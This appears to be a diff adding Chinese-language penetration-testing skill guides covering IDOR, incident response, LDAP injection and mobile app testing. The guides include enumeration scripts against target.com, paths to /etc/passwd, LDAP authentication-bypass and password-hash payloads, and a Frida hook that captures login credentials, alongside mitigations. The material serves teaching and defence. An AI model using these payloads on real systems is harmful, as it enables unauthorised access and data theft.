raise ValueError("File too large")
|
||||
```
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 仅在授权测试环境中进行
|
||||
- 避免上传恶意文件到生产环境
|
||||
- 测试后及时清理
|
||||
- 注意不同服务器的解析差异
|
||||
@@ -0,0 +1,319 @@
|
||||
---
|
||||
name: idor-testing
|
||||
description: IDOR不安全的直接对象引用测试的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# IDOR不安全的直接对象引用测试
|
||||
|
||||
## 概述
|
||||
|
||||
IDOR(Insecure Direct Object Reference)是一种访问控制漏洞,当应用程序直接使用用户提供的输入来访问资源,而未验证用户是否有权限访问该资源时发生。本技能提供IDOR漏洞的检测、利用和防护方法。
|
||||
|
||||
## 漏洞原理
|
||||
|
||||
应用程序使用可预测的标识符(如ID、文件名)直接引用资源,未验证当前用户是否有权限访问该资源。
|
||||
|
||||
**危险代码示例:**
|
||||
```php
|
||||
// 直接使用用户输入的ID
|
||||
$file = file_get_contents('/files/' . $_GET['id'] . '.pdf');
|
||||
```
|
||||
|
||||
## 测试方法
|
||||
|
||||
### 1. 识别直接对象引用
|
||||
|
||||
**常见资源类型:**
|
||||
- 用户ID
|
||||
- 文件ID/文件名
|
||||
- 订单ID
|
||||
- 文档ID
|
||||
- 账户ID
|
||||
- 记录ID
|
||||
|
||||
**常见位置:**
|
||||
- URL参数
|
||||
- POST数据
|
||||
- Cookie值
|
||||
- HTTP头
|
||||
- 文件路径
|
||||
|
||||
### 2. 枚举测试
|
||||
|
||||
**顺序ID测试:**
|
||||
```
|
||||
/user?id=1
|
||||
/user?id=2
|
||||
/user?id=3
|
||||
```
|
||||
|
||||
**UUID测试:**
|
||||
```
|
||||
/user?id=550e8400-e29b-41d4-a716-446655440000
|
||||
/user?id=550e8400-e29b-41d4-a716-446655440001
|
||||
```
|
||||
|
||||
**文件名测试:**
|
||||
```
|
||||
/files/document1.pdf
|
||||
/files/document2.pdf
|
||||
/files/invoice_2024_001.pdf
|
||||
```
|
||||
|
||||
### 3. 水平权限测试
|
||||
|
||||
**访问其他用户资源:**
|
||||
```
|
||||
当前用户ID: 100
|
||||
测试: /user?id=101
|
||||
测试: /user?id=102
|
||||
```
|
||||
|
||||
**访问其他用户文件:**
|
||||
```
|
||||
/files/user100_document.pdf
|
||||
测试: /files/user101_document.pdf
|
||||
```
|
||||
|
||||
### 4. 垂直权限测试
|
||||
|
||||
**普通用户访问管理员资源:**
|
||||
```
|
||||
/admin/users?id=1
|
||||
/admin/settings
|
||||
/admin/logs
|
||||
```
|
||||
|
||||
## 利用技术
|
||||
|
||||
### 用户信息泄露
|
||||
|
||||
**枚举用户资料:**
|
||||
```bash
|
||||
# 顺序枚举
|
||||
for i in {1..1000}; do
|
||||
curl "https://target.com/user?id=$i"
|
||||
done
|
||||
|
||||
# 观察响应差异
|
||||
```
|
||||
|
||||
### 文件访问
|
||||
|
||||
**访问其他用户文件:**
|
||||
```
|
||||
/files/invoice_12345.pdf
|
||||
/files/report_67890.pdf
|
||||
/files/contract_11111.pdf
|
||||
```
|
||||
|
||||
**目录遍历结合:**
|
||||
```
|
||||
/files/../admin/config.php
|
||||
/files/../../etc/passwd
|
||||
```
|
||||
|
||||
### 数据修改
|
||||
|
||||
**修改其他用户数据:**
|
||||
```http
|
||||
POST /api/user/update
|
||||
Content-Type: application/json
|
||||
|
||||
{
|
||||
"id": 101,
|
||||
"email": "attacker@evil.com"
|
||||
}
|
||||
```
|
||||
|
||||
### 批量操作
|
||||
|
||||
**批量获取数据:**
|
||||
```python
|
||||
import requests
|
||||
|
||||
for user_id in range(1, 1000):
|
||||
response = requests.get(f'https://target.com/api/user/{user_id}')
|
||||
if response.status_code == 200:
|
||||
print(f"User {user_id}: {response.json()}")
|
||||
```
|
||||
|
||||
## 绕过技术
|
||||
|
||||
### ID混淆
|
||||
|
||||
**Base64编码:**
|
||||
```
|
||||
原始ID: 123
|
||||
编码: MTIz
|
||||
URL: /user?id=MTIz
|
||||
```
|
||||
|
||||
**哈希值:**
|
||||
```
|
||||
原始ID: 123
|
||||
哈希: 202cb962ac59075b964b07152d234b70
|
||||
URL: /user?id=202cb962ac59075b964b07152d234b70
|
||||
```
|
||||
|
||||
### 参数名混淆
|
||||
|
||||
**使用不同参数名:**
|
||||
```
|
||||
/user?id=123
|
||||
/user?uid=123
|
||||
/user?user_id=123
|
||||
/user?account=123
|
||||
```
|
||||
|
||||
### HTTP方法绕过
|
||||
|
||||
**尝试不同HTTP方法:**
|
||||
```
|
||||
GET /user/123
|
||||
POST /user/123
|
||||
PUT /user/123
|
||||
PATCH /user/123
|
||||
```
|
||||
|
||||
### 路径混淆
|
||||
|
||||
**尝试不同路径:**
|
||||
```
|
||||
/api/v1/user/123
|
||||
/api/user/123
|
||||
/user/123
|
||||
/users/123
|
||||
```
|
||||
|
||||
## 工具使用
|
||||
|
||||
### Burp Suite
|
||||
|
||||
**使用Intruder:**
|
||||
1. 拦截请求
|
||||
2. 发送到Intruder
|
||||
3. 标记ID参数
|
||||
4. 使用数字序列或自定义列表
|
||||
5. 观察响应差异
|
||||
|
||||
**使用Repeater:**
|
||||
1. 手动修改ID
|
||||
2. 测试不同值
|
||||
3. 观察响应
|
||||
|
||||
### OWASP ZAP
|
||||
|
||||
```bash
|
||||
# 使用ZAP进行IDOR扫描
|
||||
zap-cli active-scan --scanners all http://target.com
|
||||
```
|
||||
|
||||
### Python脚本
|
||||
|
||||
```python
|
||||
import requests
|
||||
import json
|
||||
|
||||
def test_idor(base_url, user_id_range):
|
||||
for user_id in user_id_range:
|
||||
url = f"{base_url}/user?id={user_id}"
|
||||
response = requests.get(url)
|
||||
|
||||
if response.status_code == 200:
|
||||
data = response.json()
|
||||
print(f"User {user_id}: {data.get('email', 'N/A')}")
|
||||
|
||||
test_idor("https://target.com", range(1, 100))
|
||||
```
|
||||
|
||||
## 验证和报告
|
||||
|
||||
### 验证步骤
|
||||
|
||||
1. 确认可以访问未授权的资源
|
||||
2. 验证可以读取、修改或删除其他用户数据
|
||||
3. 评估影响(数据泄露、隐私侵犯等)
|
||||
4. 记录完整的POC
|
||||
|
||||
### 报告要点
|
||||
|
||||
- 漏洞位置和资源标识符
|
||||
- 可访问的未授权资源
|
||||
- 完整的利用步骤和PoC
|
||||
- 修复建议(访问控制、资源映射等)
|
||||
|
||||
## 防护措施
|
||||
|
||||
### 推荐方案
|
||||
|
||||
1. **访问控制验证**
|
||||
```python
|
||||
def get_user_data(user_id, current_user_id):
|
||||
# 验证权限
|
||||
if user_id != current_user_id:
|
||||
raise PermissionDenied("Cannot access other user's data")
|
||||
|
||||
# 返回数据
|
||||
return db.get_user(user_id)
|
||||
```
|
||||
|
||||
2. **间接对象引用**
|
||||
```python
|
||||
# 使用映射表
|
||||
user_mapping = {
|
||||
'abc123': 100,
|
||||
'def456': 101,
|
||||
'ghi789': 102
|
||||
}
|
||||
|
||||
def get_user(mapped_id):
|
||||
real_id = user_mapping.get(mapped_id)
|
||||
if not real_id:
|
||||
raise NotFound()
|
||||
return db.get_user(real_id)
|
||||
```
|
||||
|
||||
3. **基于角色的访问控制**
|
||||
```python
|
||||
def check_permission(user, resource):
|
||||
if user.role == 'admin':
|
||||
return True
|
||||
if resource.owner_id == user.id:
|
||||
return True
|
||||
return False
|
||||
```
|
||||
|
||||
4. **资源所有权验证**
|
||||
```python
|
||||
def update_user_data(user_id, data, current_user):
|
||||
user = db.get_user(user_id)
|
||||
|
||||
# 验证所有权
|
||||
if user.id != current_user.id and current_user.role != 'admin':
|
||||
raise PermissionDenied()
|
||||
|
||||
# 更新数据
|
||||
db.update_user(user_id, data)
|
||||
```
|
||||
|
||||
5. **使用不可预测的标识符**
|
||||
```python
|
||||
import uuid
|
||||
|
||||
# 使用UUID替代顺序ID
|
||||
resource_id = str(uuid.uuid4())
|
||||
```
|
||||
|
||||
6. **最小权限原则**
|
||||
- 只返回用户有权限访问的数据
|
||||
- 使用数据过滤
|
||||
- 限制可访问的资源范围
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 仅在授权测试环境中进行
|
||||
- 避免访问或修改真实用户数据
|
||||
- 注意不同资源的访问控制差异
|
||||
- 测试时注意请求频率,避免触发防护
|
||||
@@ -0,0 +1,272 @@
|
||||
---
|
||||
name: incident-response
|
||||
description: 安全事件响应的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# 安全事件响应
|
||||
|
||||
## 概述
|
||||
|
||||
安全事件响应是处理安全事件的关键流程。本技能提供安全事件响应的方法、工具和最佳实践。
|
||||
|
||||
## 响应流程
|
||||
|
||||
### 1. 准备阶段
|
||||
|
||||
**准备工作:**
|
||||
- 建立响应团队
|
||||
- 制定响应计划
|
||||
- 准备工具和资源
|
||||
- 建立通信渠道
|
||||
|
||||
### 2. 识别阶段
|
||||
|
||||
**识别事件:**
|
||||
- 监控告警
|
||||
- 异常检测
|
||||
- 日志分析
|
||||
- 用户报告
|
||||
|
||||
### 3. 遏制阶段
|
||||
|
||||
**遏制措施:**
|
||||
- 隔离受影响系统
|
||||
- 禁用账户
|
||||
- 阻断网络连接
|
||||
- 备份证据
|
||||
|
||||
### 4. 清除阶段
|
||||
|
||||
**清除威胁:**
|
||||
- 移除恶意软件
|
||||
- 修复漏洞
|
||||
- 重置凭证
|
||||
- 清理后门
|
||||
|
||||
### 5. 恢复阶段
|
||||
|
||||
**恢复系统:**
|
||||
- 恢复备份
|
||||
- 验证系统完整性
|
||||
- 监控系统
|
||||
- 逐步恢复服务
|
||||
|
||||
### 6. 总结阶段
|
||||
|
||||
**总结经验:**
|
||||
- 事件报告
|
||||
- 经验教训
|
||||
- 改进措施
|
||||
- 更新流程
|
||||
|
||||
## 工具使用
|
||||
|
||||
### 日志分析
|
||||
|
||||
**使用Splunk:**
|
||||
```bash
|
||||
# 搜索日志
|
||||
index=security event_type="failed_login"
|
||||
|
||||
# 统计分析
|
||||
index=security | stats count by src_ip
|
||||
|
||||
# 时间序列分析
|
||||
index=security | timechart count by event_type
|
||||
```
|
||||
|
||||
**使用ELK:**
|
||||
```bash
|
||||
# Elasticsearch查询
|
||||
GET /logs/_search
|
||||
{
|
||||
"query": {
|
||||
"match": {
|
||||
"event_type": "malware"
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 取证工具
|
||||
|
||||
**使用Volatility:**
|
||||
```bash
|
||||
# 分析内存镜像
|
||||
volatility -f memory.dump imageinfo
|
||||
|
||||
# 列出进程
|
||||
volatility -f memory.dump --profile=Win7SP1x64 pslist
|
||||
|
||||
# 提取进程内存
|
||||
volatility -f memory.dump --profile=Win7SP1x64 memdump -p 1234 -D output/
|
||||
```
|
||||
|
||||
**使用Autopsy:**
|
||||
```bash
|
||||
# 启动Autopsy
|
||||
# 创建案例
|
||||
# 添加证据
|
||||
# 分析数据
|
||||
```
|
||||
|
||||
### 网络分析
|
||||
|
||||
**使用Wireshark:**
|
||||
```bash
|
||||
# 捕获流量
|
||||
wireshark -i eth0
|
||||
|
||||
# 分析PCAP文件
|
||||
wireshark -r capture.pcap
|
||||
|
||||
# 过滤流量
|
||||
# 显示过滤器: ip.addr == 192.168.1.100
|
||||
# 捕获过滤器: host 192.168.1.100
|
||||
```
|
||||
|
||||
**使用tcpdump:**
|
||||
```bash
|
||||
# 捕获流量
|
||||
tcpdump -i eth0 -w capture.pcap
|
||||
|
||||
# 分析流量
|
||||
tcpdump -r capture.pcap -A
|
||||
```
|
||||
|
||||
## 事件类型
|
||||
|
||||
### 恶意软件
|
||||
|
||||
**响应步骤:**
|
||||
1. 隔离受影响系统
|
||||
2. 收集样本
|
||||
3. 分析恶意软件
|
||||
4. 清除威胁
|
||||
5. 修复漏洞
|
||||
|
||||
**工具:**
|
||||
- VirusTotal
|
||||
- Cuckoo Sandbox
|
||||
- YARA规则
|
||||
|
||||
### 数据泄露
|
||||
|
||||
**响应步骤:**
|
||||
1. 确认泄露范围
|
||||
2. 遏制泄露
|
||||
3. 评估影响
|
||||
4. 通知相关方
|
||||
5. 修复漏洞
|
||||
|
||||
**检查项目:**
|
||||
- 泄露数据量
|
||||
- 受影响用户
|
||||
- 泄露渠道
|
||||
- 数据敏感性
|
||||
|
||||
### 拒绝服务
|
||||
|
||||
**响应步骤:**
|
||||
1. 确认攻击类型
|
||||
2. 启用防护措施
|
||||
3. 过滤恶意流量
|
||||
4. 监控系统状态
|
||||
5. 恢复正常服务
|
||||
|
||||
**防护措施:**
|
||||
- DDoS防护服务
|
||||
- 流量清洗
|
||||
- 限流措施
|
||||
- CDN防护
|
||||
|
||||
### 未授权访问
|
||||
|
||||
**响应步骤:**
|
||||
1. 禁用受影响账户
|
||||
2. 重置凭证
|
||||
3. 检查访问日志
|
||||
4. 评估数据访问
|
||||
5. 修复漏洞
|
||||
|
||||
**检查项目:**
|
||||
- 访问时间
|
||||
- 访问内容
|
||||
- 访问来源
|
||||
- 数据修改
|
||||
|
||||
## 响应清单
|
||||
|
||||
### 准备阶段
|
||||
- [ ] 建立响应团队
|
||||
- [ ] 制定响应计划
|
||||
- [ ] 准备工具
|
||||
- [ ] 建立通信渠道
|
||||
|
||||
### 识别阶段
|
||||
- [ ] 确认事件
|
||||
- [ ] 收集信息
|
||||
- [ ] 评估影响
|
||||
- [ ] 记录时间线
|
||||
|
||||
### 遏制阶段
|
||||
- [ ] 隔离系统
|
||||
- [ ] 禁用账户
|
||||
- [ ] 阻断连接
|
||||
- [ ] 备份证据
|
||||
|
||||
### 清除阶段
|
||||
- [ ] 移除威胁
|
||||
- [ ] 修复漏洞
|
||||
- [ ] 重置凭证
|
||||
- [ ] 验证清除
|
||||
|
||||
### 恢复阶段
|
||||
- [ ] 恢复系统
|
||||
- [ ] 验证完整性
|
||||
- [ ] 监控系统
|
||||
- [ ] 恢复服务
|
||||
|
||||
### 总结阶段
|
||||
- [ ] 编写报告
|
||||
- [ ] 总结经验
|
||||
- [ ] 改进措施
|
||||
- [ ] 更新流程
|
||||
|
||||
## 最佳实践
|
||||
|
||||
### 1. 准备
|
||||
|
||||
- 建立响应团队
|
||||
- 制定响应计划
|
||||
- 定期演练
|
||||
- 准备工具
|
||||
|
||||
### 2. 响应
|
||||
|
||||
- 快速响应
|
||||
- 系统化处理
|
||||
- 记录所有操作
|
||||
- 保护证据
|
||||
|
||||
### 3. 沟通
|
||||
|
||||
- 内部沟通
|
||||
- 外部通知
|
||||
- 状态更新
|
||||
- 事后报告
|
||||
|
||||
### 4. 改进
|
||||
|
||||
- 事件分析
|
||||
- 流程改进
|
||||
- 工具更新
|
||||
- 培训提升
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 快速响应
|
||||
- 保护证据
|
||||
- 记录操作
|
||||
- 遵守法律法规
|
||||
@@ -0,0 +1,300 @@
|
||||
---
|
||||
name: ldap-injection-testing
|
||||
description: LDAP注入漏洞测试的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# LDAP注入漏洞测试
|
||||
|
||||
## 概述
|
||||
|
||||
LDAP注入是一种类似于SQL注入的漏洞,利用LDAP查询语句的构造缺陷,可能导致信息泄露、权限绕过等。本技能提供LDAP注入的检测、利用和防护方法。
|
||||
|
||||
## 漏洞原理
|
||||
|
||||
应用程序将用户输入直接拼接到LDAP查询语句中,未进行充分验证和过滤,导致攻击者可以修改查询逻辑。
|
||||
|
||||
**危险代码示例:**
|
||||
```java
|
||||
String filter = "(&(cn=" + userInput + ")(userPassword=" + password + "))";
|
||||
ldapContext.search(baseDN, filter, ...);
|
||||
```
|
||||
|
||||
## LDAP基础
|
||||
|
||||
### 查询语法
|
||||
|
||||
**基础查询:**
|
||||
```
|
||||
(cn=John)
|
||||
(objectClass=person)
|
||||
(&(cn=John)(mail=john@example.com))
|
||||
(|(cn=John)(cn=Jane))
|
||||
(!(cn=John))
|
||||
```
|
||||
|
||||
### 特殊字符
|
||||
|
||||
**需要转义的字符:**
|
||||
- `(` `)` - 括号
|
||||
- `*` - 通配符
|
||||
- `\` - 转义符
|
||||
- `/` - 路径分隔符
|
||||
- `NUL` - 空字符
|
||||
|
||||
## 测试方法
|
||||
|
||||
### 1. 识别LDAP输入点
|
||||
|
||||
**常见功能:**
|
||||
- 用户登录
|
||||
- 用户搜索
|
||||
- 目录浏览
|
||||
- 权限验证
|
||||
|
||||
### 2. 基础检测
|
||||
|
||||
**测试特殊字符:**
|
||||
```
|
||||
*)(&
|
||||
*)(|
|
||||
*))(
|
||||
*))%00
|
||||
```
|
||||
|
||||
**测试逻辑操作符:**
|
||||
```
|
||||
*)(&(cn=*
|
||||
*)(|(cn=*
|
||||
*))(!(cn=*
|
||||
```
|
||||
|
||||
### 3. 认证绕过
|
||||
|
||||
**基础绕过:**
|
||||
```
|
||||
用户名: *)(&
|
||||
密码: *
|
||||
查询: (&(cn=*)(&)(userPassword=*))
|
||||
```
|
||||
|
||||
**更精确的绕过:**
|
||||
```
|
||||
用户名: admin)(&(cn=admin
|
||||
密码: *))
|
||||
查询: (&(cn=admin)(&(cn=admin)(userPassword=*)))
|
||||
```
|
||||
|
||||
### 4. 信息泄露
|
||||
|
||||
**枚举用户:**
|
||||
```
|
||||
*)(cn=*
|
||||
*)(uid=*
|
||||
*)(mail=*
|
||||
```
|
||||
|
||||
**获取属性:**
|
||||
```
|
||||
*)(|(cn=*)(userPassword=*
|
||||
*)(|(objectClass=*)(cn=*
|
||||
```
|
||||
|
||||
## 利用技术
|
||||
|
||||
### 认证绕过
|
||||
|
||||
**方法1:逻辑绕过**
|
||||
```
|
||||
输入: *)(&
|
||||
查询: (&(cn=*)(&)(userPassword=*))
|
||||
结果: 匹配所有用户
|
||||
```
|
||||
|
||||
**方法2:注释绕过**
|
||||
```
|
||||
输入: admin)(&(cn=admin
|
||||
查询: (&(cn=admin)(&(cn=admin)(userPassword=*)))
|
||||
```
|
||||
|
||||
**方法3:通配符**
|
||||
```
|
||||
输入: *)(|(cn=*)(userPassword=*
|
||||
查询: (&(cn=*)(|(cn=*)(userPassword=*)(userPassword=*))
|
||||
```
|
||||
|
||||
### 信息泄露
|
||||
|
||||
**枚举所有用户:**
|
||||
```
|
||||
搜索: *)(cn=*
|
||||
结果: 返回所有cn属性
|
||||
```
|
||||
|
||||
**获取密码哈希:**
|
||||
```
|
||||
搜索: *)(|(cn=*)(userPassword=*
|
||||
结果: 返回用户和密码哈希
|
||||
```
|
||||
|
||||
**获取敏感属性:**
|
||||
```
|
||||
搜索: *)(|(cn=*)(mail=*)(telephoneNumber=*
|
||||
结果: 返回多个敏感属性
|
||||
```
|
||||
|
||||
### 权限提升
|
||||
|
||||
**修改查询逻辑:**
|
||||
```
|
||||
原始: (&(cn=user)(memberOf=CN=Users,DC=example,DC=com))
|
||||
注入: user)(memberOf=CN=Admins,DC=example,DC=com))(|(cn=user
|
||||
结果: 可能绕过权限检查
|
||||
```
|
||||
|
||||
## 绕过技术
|
||||
|
||||
### 编码绕过
|
||||
|
||||
**URL编码:**
|
||||
```
|
||||
*)(& → %2A%29%28%26
|
||||
*)(| → %2A%29%28%7C
|
||||
```
|
||||
|
||||
**Unicode编码:**
|
||||
```
|
||||
* → \u002A
|
||||
( → \u0028
|
||||
) → \u0029
|
||||
```
|
||||
|
||||
### 注释绕过
|
||||
|
||||
**使用注释:**
|
||||
```
|
||||
*)(&(cn=*
|
||||
*)(|(cn=*
|
||||
```
|
||||
|
||||
### 空字符注入
|
||||
|
||||
**使用NULL字节:**
|
||||
```
|
||||
*))%00
|
||||
```
|
||||
|
||||
## 工具使用
|
||||
|
||||
### JXplorer
|
||||
|
||||
**图形化LDAP客户端:**
|
||||
- 连接LDAP服务器
|
||||
- 浏览目录结构
|
||||
- 执行查询测试
|
||||
|
||||
### ldapsearch
|
||||
|
||||
```bash
|
||||
# 基础查询
|
||||
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)"
|
||||
|
||||
# 测试注入
|
||||
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)(&"
|
||||
```
|
||||
|
||||
### Burp Suite
|
||||
|
||||
1. 拦截LDAP查询请求
|
||||
2. 修改查询参数
|
||||
3. 观察响应结果
|
||||
|
||||
### Python脚本
|
||||
|
||||
```python
|
||||
import ldap3
|
||||
|
||||
server = ldap3.Server('ldap://target.com')
|
||||
conn = ldap3.Connection(server, authentication=ldap3.SIMPLE,
|
||||
user='cn=admin,dc=example,dc=com',
|
||||
password='password')
|
||||
|
||||
# 测试注入
|
||||
filter_str = '*)(&'
|
||||
conn.search('dc=example,dc=com', filter_str)
|
||||
print(conn.entries)
|
||||
```
|
||||
|
||||
## 验证和报告
|
||||
|
||||
### 验证步骤
|
||||
|
||||
1. 确认可以控制LDAP查询
|
||||
2. 验证认证绕过或信息泄露
|
||||
3. 评估影响(未授权访问、数据泄露等)
|
||||
4. 记录完整的POC
|
||||
|
||||
### 报告要点
|
||||
|
||||
- 漏洞位置和输入参数
|
||||
- LDAP查询构造方式
|
||||
- 完整的利用步骤和PoC
|
||||
- 修复建议(输入验证、参数化查询等)
|
||||
|
||||
## 防护措施
|
||||
|
||||
### 推荐方案
|
||||
|
||||
1. **输入验证**
|
||||
```java
|
||||
private static final String[] LDAP_ESCAPE_CHARS =
|
||||
{"\\", "*", "(", ")", "\0", "/"};
|
||||
|
||||
public static String escapeLDAP(String input) {
|
||||
if (input == null) {
|
||||
return null;
|
||||
}
|
||||
StringBuilder sb = new StringBuilder();
|
||||
for (int i = 0; i < input.length(); i++) {
|
||||
char c = input.charAt(i);
|
||||
if (Arrays.asList(LDAP_ESCAPE_CHARS).contains(String.valueOf(c))) {
|
||||
sb.append("\\");
|
||||
}
|
||||
sb.append(c);
|
||||
}
|
||||
return sb.toString();
|
||||
}
|
||||
```
|
||||
|
||||
2. **参数化查询**
|
||||
```java
|
||||
// 使用LDAP API的参数化功能
|
||||
String filter = "(&(cn={0})(userPassword={1}))";
|
||||
Object[] args = {escapedCN, escapedPassword};
|
||||
// 使用API构建查询
|
||||
```
|
||||
|
||||
3. **白名单验证**
|
||||
```java
|
||||
// 只允许特定字符
|
||||
if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
|
||||
throw new IllegalArgumentException("Invalid input");
|
||||
}
|
||||
```
|
||||
|
||||
4. **最小权限**
|
||||
- LDAP连接使用最小权限账户
|
||||
- 限制可查询的属性
|
||||
- 使用访问控制列表
|
||||
|
||||
5. **错误处理**
|
||||
- 不返回详细错误信息
|
||||
- 统一错误响应
|
||||
- 记录错误日志
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 仅在授权测试环境中进行
|
||||
- 注意不同LDAP服务器的语法差异
|
||||
- 测试时避免对目录造成影响
|
||||
- 了解目标LDAP服务器的配置
|
||||
@@ -0,0 +1,370 @@
|
||||
---
|
||||
name: mobile-app-security-testing
|
||||
description: 移动应用安全测试的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# 移动应用安全测试
|
||||
|
||||
## 概述
|
||||
|
||||
移动应用安全测试是确保移动应用安全性的重要环节。本技能提供移动应用安全测试的方法、工具和最佳实践,涵盖Android和iOS平台。
|
||||
|
||||
## 测试范围
|
||||
|
||||
### 1. 应用安全
|
||||
|
||||
**检查项目:**
|
||||
- 代码混淆
|
||||
- 反编译防护
|
||||
- 调试防护
|
||||
- 证书绑定
|
||||
|
||||
### 2. 数据安全
|
||||
|
||||
**检查项目:**
|
||||
- 数据加密
|
||||
- 密钥管理
|
||||
- 敏感数据存储
|
||||
- 数据传输
|
||||
|
||||
### 3. 认证授权
|
||||
|
||||
**检查项目:**
|
||||
- 认证机制
|
||||
- Token管理
|
||||
- 生物识别
|
||||
- 会话管理
|
||||
|
||||
### 4. 通信安全
|
||||
|
||||
**检查项目:**
|
||||
- TLS/SSL配置
|
||||
- 证书验证
|
||||
- API安全
|
||||
- 中间人攻击防护
|
||||
|
||||
## Android安全测试
|
||||
|
||||
### 静态分析
|
||||
|
||||
**使用APKTool:**
|
||||
```bash
|
||||
# 反编译APK
|
||||
apktool d app.apk
|
||||
|
||||
# 查看AndroidManifest.xml
|
||||
cat app/AndroidManifest.xml
|
||||
|
||||
# 查看Smali代码
|
||||
find app/smali -name "*.smali"
|
||||
```
|
||||
|
||||
**使用Jadx:**
|
||||
```bash
|
||||
# 反编译APK
|
||||
jadx -d output app.apk
|
||||
|
||||
# 查看Java源码
|
||||
find output -name "*.java"
|
||||
```
|
||||
|
||||
**使用MobSF:**
|
||||
```bash
|
||||
# 启动MobSF
|
||||
docker run -it -p 8000:8000 opensecurity/mobsf
|
||||
|
||||
# 上传APK进行分析
|
||||
# 访问 http://localhost:8000
|
||||
```
|
||||
|
||||
### 动态分析
|
||||
|
||||
**使用Frida:**
|
||||
```javascript
|
||||
// Hook函数
|
||||
Java.perform(function() {
|
||||
var MainActivity = Java.use("com.example.MainActivity");
|
||||
MainActivity.onCreate.implementation = function(savedInstanceState) {
|
||||
console.log("[*] onCreate called");
|
||||
this.onCreate(savedInstanceState);
|
||||
};
|
||||
});
|
||||
```
|
||||
|
||||
**使用Objection:**
|
||||
```bash
|
||||
# 启动Objection
|
||||
objection -g com.example.app explore
|
||||
|
||||
# Hook函数
|
||||
android hooking watch class_method com.example.MainActivity.onCreate
|
||||
```
|
||||
|
||||
**使用Burp Suite:**
|
||||
```bash
|
||||
# 配置代理
|
||||
# Android设置代理指向Burp Suite
|
||||
# 安装Burp证书
|
||||
```
|
||||
|
||||
### 常见漏洞
|
||||
|
||||
**硬编码密钥:**
|
||||
```java
|
||||
// 不安全的代码
|
||||
String apiKey = "1234567890abcdef";
|
||||
String password = "admin123";
|
||||
```
|
||||
|
||||
**不安全的存储:**
|
||||
```java
|
||||
// SharedPreferences存储敏感数据
|
||||
SharedPreferences prefs = getSharedPreferences("data", MODE_WORLD_READABLE);
|
||||
prefs.edit().putString("password", password).apply();
|
||||
```
|
||||
|
||||
**证书验证绕过:**
|
||||
```java
|
||||
// 不验证证书
|
||||
TrustManager[] trustAllCerts = new TrustManager[] {
|
||||
new X509TrustManager() {
|
||||
public X509Certificate[] getAcceptedIssuers() { return null; }
|
||||
public void checkClientTrusted(X509Certificate[] certs, String authType) { }
|
||||
public void checkServerTrusted(X509Certificate[] certs, String authType) { }
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## iOS安全测试
|
||||
|
||||
### 静态分析
|
||||
|
||||
**使用class-dump:**
|
||||
```bash
|
||||
# 导出头文件
|
||||
class-dump app.ipa
|
||||
|
||||
# 查看头文件
|
||||
find app -name "*.h"
|
||||
```
|
||||
|
||||
**使用Hopper:**
|
||||
```bash
|
||||
# 使用Hopper反汇编
|
||||
# 打开app二进制文件
|
||||
# 分析汇编代码
|
||||
```
|
||||
|
||||
**使用otool:**
|
||||
```bash
|
||||
# 查看Mach-O信息
|
||||
otool -L app
|
||||
|
||||
# 查看字符串
|
||||
strings app | grep -i "password\|key\|secret"
|
||||
```
|
||||
|
||||
### 动态分析
|
||||
|
||||
**使用Frida:**
|
||||
```javascript
|
||||
// Hook Objective-C方法
|
||||
var className = ObjC.classes.ViewController;
|
||||
var method = className['- login:password:'];
|
||||
Interceptor.attach(method.implementation, {
|
||||
onEnter: function(args) {
|
||||
console.log("[*] Login called");
|
||||
console.log("Username: " + ObjC.Object(args[2]).toString());
|
||||
console.log("Password: " + ObjC.Object(args[3]).toString());
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
**使用Cycript:**
|
||||
```bash
|
||||
# 附加到进程
|
||||
cycript -p app
|
||||
|
||||
# 执行命令
|
||||
[UIApplication sharedApplication]
|
||||
```
|
||||
|
||||
### 常见漏洞
|
||||
|
||||
**硬编码密钥:**
|
||||
```objective-c
|
||||
// 不安全的代码
|
||||
NSString *apiKey = @"1234567890abcdef";
|
||||
NSString *password = @"admin123";
|
||||
```
|
||||
|
||||
**不安全的存储:**
|
||||
```objective-c
|
||||
// Keychain存储不当
|
||||
NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults];
|
||||
[defaults setObject:password forKey:@"password"];
|
||||
```
|
||||
|
||||
**证书验证绕过:**
|
||||
```objective-c
|
||||
// 不验证证书
|
||||
- (void)connection:(NSURLConnection *)connection
|
||||
didReceiveAuthenticationChallenge:(NSURLAuthenticationChallenge *)challenge {
|
||||
[challenge.sender useCredential:[NSURLCredential credentialForTrust:challenge.protectionSpace.serverTrust]
|
||||
forAuthenticationChallenge:challenge];
|
||||
}
|
||||
```
|
||||
|
||||
## 工具使用
|
||||
|
||||
### MobSF
|
||||
|
||||
```bash
|
||||
# 启动MobSF
|
||||
docker run -it -p 8000:8000 opensecurity/mobsf
|
||||
|
||||
# 上传应用进行分析
|
||||
# 支持Android和iOS
|
||||
```
|
||||
|
||||
### Frida
|
||||
|
||||
```bash
|
||||
# 安装Frida
|
||||
pip install frida-tools
|
||||
|
||||
# 运行脚本
|
||||
frida -U -f com.example.app -l script.js
|
||||
```
|
||||
|
||||
### Objection
|
||||
|
||||
```bash
|
||||
# 安装Objection
|
||||
pip install objection
|
||||
|
||||
# 启动Objection
|
||||
objection -g com.example.app explore
|
||||
```
|
||||
|
||||
### Burp Suite
|
||||
|
||||
**配置代理:**
|
||||
1. 配置Burp Suite监听器
|
||||
2. 移动设备设置代理
|
||||
3. 安装Burp证书
|
||||
4. 拦截和分析流量
|
||||
|
||||
## 测试清单
|
||||
|
||||
### 应用安全
|
||||
- [ ] 代码混淆检查
|
||||
- [ ] 反编译防护
|
||||
- [ ] 调试防护
|
||||
- [ ] 证书绑定
|
||||
|
||||
### 数据安全
|
||||
- [ ] 数据加密检查
|
||||
- [ ] 密钥管理
|
||||
- [ ] 敏感数据存储
|
||||
- [ ] 数据传输安全
|
